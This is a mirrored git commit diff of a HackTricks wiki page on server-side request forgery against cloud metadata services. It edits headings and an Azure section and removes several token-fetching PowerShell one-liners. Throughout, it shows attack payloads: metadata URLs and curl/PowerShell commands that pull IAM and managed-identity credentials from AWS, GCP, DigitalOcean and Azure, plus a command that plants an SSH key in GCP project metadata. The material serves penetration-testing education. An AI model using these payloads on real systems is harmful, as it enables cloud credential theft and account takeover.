mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
aa ssrf
This commit is contained in:
parent
10c0f3e054
commit
21283c5644
@ -111,7 +111,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null |
|
||||
> [!NOTE]
|
||||
> Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
|
||||
|
||||
### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a>
|
||||
### SSRF for AWS Lambda
|
||||
|
||||
In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
|
||||
|
||||
@ -126,7 +126,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat
|
||||
> [!WARNING]
|
||||
> Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
|
||||
|
||||
### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a>
|
||||
### SSRF URL for AWS Elastic Beanstalk
|
||||
|
||||
We retrieve the `accountId` and `region` from the API.
|
||||
|
||||
@ -145,11 +145,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
|
||||
|
||||
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
|
||||
|
||||
## GCP <a href="#id-6440" id="id-6440"></a>
|
||||
## GCP
|
||||
|
||||
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
|
||||
|
||||
### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a>
|
||||
### SSRF URL for Google Cloud
|
||||
|
||||
Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs:
|
||||
|
||||
@ -260,7 +260,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||
> gcloud config unset auth/access_token_file
|
||||
> ```
|
||||
|
||||
### Add an SSH key <a href="#id-3e24" id="id-3e24"></a>
|
||||
### Add an SSH key
|
||||
|
||||
Extract the token
|
||||
|
||||
@ -289,7 +289,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
|
||||
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
|
||||
```
|
||||
|
||||
### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a>
|
||||
### Cloud Functions
|
||||
|
||||
The metadata endpoint works the same as in VMs but without some endpoints:
|
||||
|
||||
@ -318,7 +318,7 @@ for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMeta
|
||||
done
|
||||
```
|
||||
|
||||
## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
|
||||
## Digital Ocean
|
||||
|
||||
> [!WARNING]
|
||||
> There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
|
||||
@ -337,7 +337,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
|
||||
curl http://169.254.169.254/metadata/v1.json | jq
|
||||
```
|
||||
|
||||
## Azure <a href="#cea8" id="cea8"></a>
|
||||
## Azure
|
||||
|
||||
### Azure VM
|
||||
|
||||
@ -442,7 +442,7 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h
|
||||
{{#endtab}}
|
||||
{{#endtabs}}
|
||||
|
||||
### Azure App & Functions Services
|
||||
### Azure App & Functions Services & Automation Accounts
|
||||
|
||||
From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server.
|
||||
|
||||
@ -519,57 +519,28 @@ $storageToken = Get-Token -Resource "https://storage.azure.com/"
|
||||
Write-Host "Storage Token: $storageToken"
|
||||
|
||||
|
||||
# Using oneliners
|
||||
|
||||
## Get management token
|
||||
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token
|
||||
|
||||
## Get graph token
|
||||
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://graph.microsoft.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token
|
||||
|
||||
## Get vault token
|
||||
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://vault.azure.net/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token
|
||||
|
||||
## Get storage token
|
||||
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token
|
||||
|
||||
|
||||
# API request in powershell to management endpoint
|
||||
$Token = 'eyJ0eX..'
|
||||
$URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
|
||||
$RequestParams = @{
|
||||
Method = 'GET'
|
||||
Uri = $URI
|
||||
Headers = @{
|
||||
'Authorization' = "Bearer $Token"
|
||||
}
|
||||
}
|
||||
(Invoke-RestMethod @RequestParams).value
|
||||
|
||||
# API request to graph endpoint (get enterprise applications)
|
||||
$Token = 'eyJ0eX..'
|
||||
$URI = 'https://graph.microsoft.com/v1.0/applications'
|
||||
$RequestParams = @{
|
||||
Method = 'GET'
|
||||
Uri = $URI
|
||||
Headers = @{
|
||||
'Authorization' = "Bearer $Token"
|
||||
}
|
||||
}
|
||||
(Invoke-RestMethod @RequestParams).value
|
||||
|
||||
# Using AzureAD Powershell module witho both management and graph tokens
|
||||
$token = 'eyJ0e..'
|
||||
$graphaccesstoken = 'eyJ0eX..'
|
||||
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc
|
||||
|
||||
# Try to get current perms over resources
|
||||
Get-AzResource
|
||||
## The following error means that the user doesn't have permissions over any resource
|
||||
Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
|
||||
At line:1 char:1
|
||||
+ Get-AzResource
|
||||
+ ~~~~~~~~~~~~~~
|
||||
+ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
|
||||
+ FullyQualifiedErrorId :
|
||||
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
|
||||
## Remember that in Automation Accounts it might be declared the client ID of the assigned user managed identity inside the variable that can be gatehred with:
|
||||
Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID'
|
||||
```
|
||||
|
||||
{{#endtab}}
|
||||
{{#endtabs}}
|
||||
|
||||
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
|
||||
## IBM Cloud
|
||||
|
||||
> [!WARNING]
|
||||
> Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
|
||||
|
Loading…
x
Reference in New Issue
Block a user